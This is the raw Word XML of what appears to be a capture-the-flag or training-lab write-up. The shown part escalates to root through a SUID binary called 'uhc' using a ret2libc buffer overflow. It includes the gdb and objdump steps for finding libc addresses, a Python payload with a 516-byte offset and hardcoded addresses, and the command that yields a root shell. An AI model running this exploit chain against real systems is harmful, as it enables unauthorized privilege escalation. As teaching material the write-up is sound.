      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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the root directory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we find a binary (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uhc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) with SUID.</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56"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this binary, it expects a string:</w:t>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6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emx9nslzicja" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BufferOverflow Ret2LibC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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exploit this binary. First, check whether it is 32-bit or 64-bit.</w:t>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88"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is already installed on the server.</w:t>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also verify the protections enabled on the binary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">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pomx5oxzuxq" w:id="15"/>
      <w:bookmarkEnd w:id="1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190500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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ihbenixcw4f" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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The NX (No Execute) bit is a CPU technology that ensures certain memory regions (such as stack and heap) are non-executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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83dzideveusv" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE</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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like ASLR, PIE randomizes the base address of the binary itself, making exploitation more difficult.</w:t>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find the return address offset. We can use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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Buffer overflow pattern generator</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wiremask.eu/tools/buffer-overflow-pattern-generator/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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32200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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36322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3149600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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943600" cy="3149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3644900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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determine that the offset is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">516 bytes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reach EIP.</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setuid + pop + main + system + eXit + sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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5vdksd3qyfir" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Required Addresses</w:t>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the addresses of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">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setuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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pop; ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">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main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">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system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">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exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">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"/bin/sh"</w:t>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gdb:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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 setuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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 main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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 system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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 exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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find &amp;system,+9999999,"/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="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Now we need to find the</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pop;ret</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instruction and return to it first.</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It will clean up the stack for us and then the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ret</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instruction will set the program counter to the next address on top of the stack.</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And again, libc is a great place to find such an instruction.</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sz w:val="26"/>
          <w:szCs w:val="26"/>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One way is like this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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objdump -d -M intel /usr/lib/libc-2.26.so | grep -B1 ret | grep pop -A1 -m 4</w:t>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58"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It then returns the relative address of the pop ret, we must then add it to the base address of the libc and we will find the address of the pop ret, then we will take the address of the libc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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511800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4h9gcmda9p21" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>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Now we will add:</w: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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gfzwimlqy1a5" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-684081969"/>
          <w:tag w:val="goog_rdk_0"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Nova Mono" w:cs="Nova Mono" w:eastAsia="Nova Mono" w:hAnsi="Nova Mono"/>
              <w:color w:val="188038"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">pop+libc → x/2i 0x000185b5+0xf7e3d000 = 0xf7e555b5</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">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4h9gcmda9p21" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>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bpsbjdp03u7k" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>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2501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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b w:val="0"/>
          <w:bCs w:val="0"/>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As we already have all the necessary addresses, we can then create a python script.</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b w:val="0"/>
          <w:bCs w:val="0"/>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However, if we send the addresses as they are, for example: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"0xf7e555b5"</w:t>
      </w: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 it will not work because the bytes stored in memory must be in reverse order (little-endian).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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from struct import pack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">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A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junk = 'A'*516</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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set_uid = pack("I",0xf7ee1720)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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pop = pack("I",0xf7e555b5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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uid = pack("I",0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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main = pack("I",0x56556245)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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 = pack("I",0xf7e78140)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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 = pack("I",0xf7e6bd10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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 pack("I",0xf7f74ab6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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B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payload = junk + set_uid + pop + uid + main + system + eXit + sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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B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 payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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B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junk + setuid + pop_ret + uid(0) + main + system + exit + sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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setuid = 0xf7ee1720</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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exit = 0xf7e6bd10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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main = 0x56556245</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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 0xf7f74ab6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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 = 0xf7e78140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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uid = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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pop = 0xf7e555b5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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C5">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C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send the script to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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46400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="94"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53"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Execute the binary using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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/tmp/vert.txt ; cat) | ./uhc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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root shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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62"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headerReference r:id="rId52" w:type="default"/>
      <w:headerReference r:id="rId53" w:type="first"/>
      <w:headerReference r:id="rId54" w:type="even"/>
      <w:footerReference r:id="rId55" w:type="default"/>
      <w:footerReference r:id="rId56" w:type="first"/>
      <w:footerReference r:id="rId5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 w:name="IBM Plex Sans SemiBold">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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="22"/>
    <w:bookmarkEnd w:id="2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91" name="image35.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3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D0">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D1">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9.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Buffered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4.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image44.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9.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32.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiremask.eu/tools/buffer-overflow-pattern-generator/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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14.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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training/training-machines/15"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31.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ret2rop.blogspot.com/2018/08/return-to-libc.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Ps3mZWQz01s&amp;list=PLIfZMtpPYFP4MaQhy_iR8uM0mJEs7P7s3" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemi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5.jp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4.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NyJ9PbmaMVA7hHxNEAK5Z98Qg==">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